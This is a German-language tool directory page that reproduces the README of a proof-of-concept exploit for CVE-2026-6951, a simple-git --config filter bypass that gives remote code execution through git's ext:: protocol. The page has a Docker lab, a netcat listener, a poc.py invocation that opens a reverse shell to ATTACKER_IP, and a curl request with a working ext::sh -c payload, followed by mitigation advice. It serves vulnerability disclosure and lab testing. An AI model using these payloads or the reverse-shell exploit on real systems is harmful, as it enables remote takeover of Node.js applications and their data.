Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6951 — Proof-of-Concept-Exploit für CVE-2026-6951, eine simple-git --config-Filterumgehung, die RCE über das Git-ext-Protokoll ermöglicht, mit einem Docker-Lab und einer Reverse-Shell-Payload. | Kitploit
Tools/GitHubGitHub/eqstlab/cve-2026-6951
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

Proof-of-Concept-Exploit für CVE-2026-6951, eine simple-git --config-Filterumgehung, die RCE über das Git-ext-Protokoll ermöglicht, mit einem Docker-Lab und einer Reverse-Shell-Payload.

Repository anzeigen
11vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-6951 simple-git Remote Code Execution

★ CVE-2026-6951 simple-git --config Option Filter Bypass RCE PoC ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


Übersicht

CVE-2026-6951 ist eine Remote-Code-Execution-Schwachstelle in simple-git, die durch einen unvollständigen Fix für CVE-2022-25912 verursacht wird. Obwohl die Option -c blockiert wurde, war die äquivalente Option --config nicht ordnungsgemäß eingeschränkt. Ein Angreifer, der Git-Argumente kontrollieren kann, kann das ext-Protokoll aktivieren und beliebige Befehle über eine ext::-Repository-URL ausführen.


Betroffene Versionen

KategorieVersion
Anfälligsimple-git-Versionen vor 3.36.0
Gepatchtsimple-git 3.36.0 oder später

Diese Umgebung verwendet simple-git 3.35.2 und @simple-git/argv-parser 1.0.3.


Auswirkung

  • Remote-Code-Execution mit den Rechten der Node.js-Anwendung
  • Offenlegung sensibler Dateien
  • Reverse-Shell-Zugriff
  • Änderung oder Löschung von Anwendungsdaten

Umgebung

Erstellen und starten Sie die anfällige Umgebung.

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

Greifen Sie auf den Dienst zu unter:

http://127.0.0.1:9107

Überprüfen Sie den Dienststatus.

curl -s http://127.0.0.1:9107/api/health

Das eingebettete Beispiel-Repository ist verfügbar unter:

file:///srv/git/sample.git

PoC

Starten Sie einen Listener auf dem Angreifer-System.

nc -lvnp 4444

Führen Sie das Exploit-Skript aus.

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

Die folgende Anfrage führt den Befehl id aus, indem sie die uneingeschränkte Option --config und das Git-ext-Protokoll missbraucht.

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

Gegenmaßnahmen

  • Aktualisieren Sie simple-git auf Version 3.36.0 oder später.
  • Übergeben Sie keine benutzergesteuerten Git-Optionen direkt an simple-git.
  • Erlauben Sie nur vertrauenswürdige Repository-URL-Schemata und lehnen Sie ext::-URLs ab.
  • Wenden Sie eine strikte Allowlist-Validierung auf Repository-URLs und Git-Argumente an.

Analyse

  • KR:
  • EN:
Tool herunterladen